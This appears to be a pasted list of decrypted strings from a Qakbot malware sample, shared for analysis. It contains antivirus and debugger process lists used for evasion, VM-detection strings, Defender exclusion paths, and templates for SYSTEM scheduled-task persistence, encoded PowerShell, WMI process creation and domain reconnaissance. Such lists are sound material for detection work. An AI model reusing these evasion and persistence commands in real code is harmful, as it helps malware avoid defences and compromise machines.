JustPaste.it - Share Text & Images the Easy Way

Full decryption strings list in qakbot sample

sample hash : af6a9b7e7aefeb903c76417ed2b8399b73657440ad5f8b48a25cfe5e97ff868f

%SystemRoot%\SysWOW64\xwizard.exe
.dat
kernelbase.dll
WBJ_IGNORE
mpr.dll
%SystemRoot%\explorer.exe
%SystemRoot%\System32\CertEnrollCtrl.exe
https
SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
open
root\SecurityCenter2
%SystemRoot%\SysWOW64\SndVol.exe
%u.%u.%u.%u.%u.%u.%04x
1234567890
%SystemRoot%\System32\Utilman.exe
snxhk_border_mywnd
%SystemRoot%\SysWOW64\wextract.exe
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Win32_PhysicalMemory
Caption
ByteFence.exe
aswhooka.dll
dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
%SystemRoot%\SysWOW64\grpconv.exe
VRTUAL;VMware;VMW;Xen
SELECT * FROM AntiVirusProduct
%s\%08X.dll
wininet.dll
avp.exe;kavtray.exe
rundll32.exe
Create
WQL
%SystemRoot%\System32\sethc.exe
AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Software\Classes
vkise.exe;isesrv.exe;cmdagent.exe
LastBootUpTime
MS_VM_CERT;VMware;Virtual Machine
Winsta0
.dll
Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
SonicWallClientProtectionService.exe;SWDash.exe
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
SystemRoot
CommandLine
%SystemRoot%\SysWOW64\explorer.exe
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
%s\system32\
SELECT * FROM Win32_OperatingSystem
wbj.go
System32
CynetEPS.exe;CynetMS.exe;CynetConsole.exe
C:\INTERNAL\__empty
cmd.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
*/*
MsMpEng.exe
image/pjpeg
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
urlmon.dll
type=0x%04X
TRUE
Win32_ComputerSystem
%SystemRoot%\System32\backgroundTaskHost.exe
ALLUSERSPROFILE
.exe
\\.\pipe\
advapi32.dll
application/x-shockwave-flash
%ProgramFiles%\Windows Media Player\wmplayer.exe
ntdll.dll
%SystemRoot%\SysWOW64\Utilman.exe
CfGetPlatformInfo
userenv.dll
LocalLow
FALSE
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
image/jpeg
image/gif
displayName
Name
Win32_PnPEntity
.cfg
APPDATA
winsta0\default
%SystemRoot%\SysWOW64\CertEnrollCtrl.exe
%SystemRoot%\SysWOW64\backgroundTaskHost.exe
pstorec.dll
RepUx.exe
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
\sf2.dll
%SystemRoot%\System32\dxdiag.exe
CSFalconService.exe;CSFalconContainer.exe
vbs
WRSA.exe
crypt32.dll
setupapi.dll
c:\saurufdifsdudqat.sys
%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe
netapi32.dll
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
VMware;PROD_VIRTUAL_DISK;VIRTUAL-DISK;XENSRC;20202020
%SystemRoot%\System32\grpconv.exe
SpyNetReporting
wtsapi32.dll
wpcap.dll
Packages
%SystemRoot%\explorer.exe
regsvr32.exe
aswhookx.dll
Content-Type: application/x-www-form-urlencoded
%SystemRoot%\SysWOW64\SearchIndexer.exe
%SystemRoot%\SysWOW64\AtBroker.exe
%SystemRoot%\System32\WerFault.exe
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
vmnat.exe
SubmitSamplesConsent
SysWOW64
shell32.dll
wmic process call create 'expand "%S" "%S"'

ROOT\CIMV2
Win32_Product
LOCALAPPDATA
%SystemRoot%\SysWOW64\mobsync.exe
ws2_32.dll
WScript.Sleep %u
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("%s", null, nul, nul)
WSCript.Sleep 2000
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile("%s")
bcrypt.dll
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
abcdefghijklmnopqrstuvwxyz
fshoster32.exe
%SystemRoot%\System32\SearchIndexer.exe
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("%s", null, nul, nul)
gdi32.dll
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'")
For Each objFile in colFiles
objFile.Copy("%s")
Next
Win32_Process
SELECT * FROM Win32_Processor
user32.dll
Win32_Bios
%SystemRoot%\SysWOW64\explorer.exe
MBAMService.exe;mbamgui.exe
%SystemRoot%\SysWOW64\mspaint.exe
frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe;dumper64.exe;user_imitator.exe;Velociraptor.exe
%SystemRoot%\System32\wextract.exe
egui.exe;ekrn.exe
select
%SystemRoot%\System32\wermgr.exe
iphlpapi.dll
SOFTWARE\Microsoft\Windows Defender\SpyNet
%SystemRoot%\SysWOW64\dxdiag.exe
%SystemRoot%\SysWOW64\WerFault.exe
%SystemRoot%\System32\AtBroker.exe
%SystemRoot%\SysWOW64\sethc.exe
%S.%06d
c:\\
S:(ML;;NW;;;LW)
fmon.exe
%SystemRoot%\System32\xwizard.exe
cscript.exe
Initializing database...
xagtnotif.exe;AppUIMonitor.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
Win32_DiskDrive
aabcdeefghiijklmnoopqrstuuvwxyyz
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\SysWOW64\wermgr.exe
kernel32.dll
%SystemRoot%\System32\mspaint.exe
bdagent.exe;vsserv.exe;vsservppl.exe
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
NTUSER.DAT
ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
from
mcshield.exe
%SystemRoot%\System32\SndVol.exe
VMware;VMW;QEMU
QEMU;VMware Pointing;VMware Accelerated;VMware SCSI;VMware SVGA;VMware Replay;VMware server memory;VirtualBox;CWSandbox;Virtual HD;QEMU;VirtIO;srootkit;vSockets;VBoxVideo;vmxnet;vmscsi;VMAUDIO;vmdebug;vm3dmp;vmrawdsk;vmx_svga;ansfltr;sbtisht;XENVIF;XENBUS;XENSRC;XENCLASS
shlwapi.dll
csc_ui.exe
CrAmTray.exe
Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
ProgramData
netstat -nao
%s "$%s = \"%s\"; & $%s"
net localgroup
powershell.exe
route print
"%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Component_08
ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
net view
ipconfig /all
Self check
T2X!wWMVH1UkMHD7SBdbgfgXrNBd(5dmRNbBI9
4Lm7DW&yMF*ELN4D8oNp0CtKUf*C2LAstORIBV
Start screenshot
%s.%u
adrclient.dll
net share
qwinsta
\System32\WindowsPowerShell\v1.0\powershell.exe
at.exe %u:%u "%s" /I
Self test FAILED!!!
Component_07
whoami /all
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
error res='%s' err=%d len=%u
nltest /domain_trusts /all_trusts
.lnk
cmd
schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
%s \"$%s = \\\"%s\\\\; & $%s\"
ERROR: GetModuleFileNameW() failed with error: %u
schtasks.exe /Delete /F /TN %u
arp -a
Self check ok!
cmd.exe /c set
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Microsoft
powershell.exe -encodedCommand %S
SELF_TEST_1
microsoft.com,google.com,kernel.org,www.wikipedia.org,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
c:\ProgramData
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
%u;%u;%u;
powershell.exe -encodedCommand
runas
/teorema505
Self test OK.
ProfileImagePath
p%08x